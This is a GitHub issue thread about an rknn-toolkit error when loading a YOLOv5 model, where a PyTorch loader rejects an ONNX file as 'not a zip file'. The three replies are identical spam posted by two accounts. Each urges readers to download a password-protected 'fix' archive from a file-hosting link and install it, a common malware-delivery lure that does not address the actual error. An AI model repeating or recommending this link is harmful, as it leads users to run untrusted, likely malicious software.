### ISSUE TITLE
Load yolov5 failed!-20240827

### ISSUE THREAD

**Issue by Hotlat6077** [rockchip-linux/rknn-toolkit#468]
--> Config model
done
--> Loading model
E Catch exception when loading pytorch model: best.onnx!
E Traceback (most recent call last):
E   File "rknn\base\RKNNlib\converter\convert_pytorch_new.py", line 3967, in rknn.base.RKNNlib.converter.convert_pytorch_new.convert_pytorch.load
E   File "rknn\base\RKNNlib\converter\pytorch_util.py", line 75, in rknn.base.RKNNlib.converter.pytorch_util.check_model_pt_version
E   File "rknn\base\RKNNlib\converter\pytorch_util.py", line 76, in rknn.base.RKNNlib.converter.pytorch_util.check_model_pt_version
E   File "D:\Anaconda3\envs\rknn\lib\zipfile.py", line 1131, in __init__
E     self._RealGetContents()
E   File "D:\Anaconda3\envs\rknn\lib\zipfile.py", line 1198, in _RealGetContents
E     raise BadZipFile("File is not a zip file")
E zipfile.BadZipFile: File is not a zip file
E Please feedback the detailed log file <log_feedback_to_the_rknn_toolkit_dev_team.log> to the RKNN Toolkit development team.
E You can also check github issues: https://github.com/rockchip-linux/rknn-toolkit/issues
best.onnx ********************
Load yolov5 failed!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
